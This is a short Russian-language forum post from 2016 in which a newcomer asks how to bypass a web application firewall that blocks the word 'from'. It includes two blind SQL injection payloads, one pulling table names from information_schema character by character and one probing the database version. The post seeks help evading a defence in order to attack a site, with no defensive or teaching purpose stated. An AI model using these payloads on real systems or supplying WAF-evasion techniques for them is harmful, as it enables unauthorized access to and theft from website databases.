
10.12.2016, 12:18
|
|
Новичок
Регистрация: 30.11.2016
Сообщений: 11
С нами:
4974806
Репутация:
0
|
|
Как обойти WAF если фильтрует слово from при такой подстановки:
+and+ascii(substring((select+table_name+from+infor mation_schema.
tables+limit+1,1),1,1 ))>0--
а так всё нормально:
+and+substring(version(),1,1)=5--
|
|
|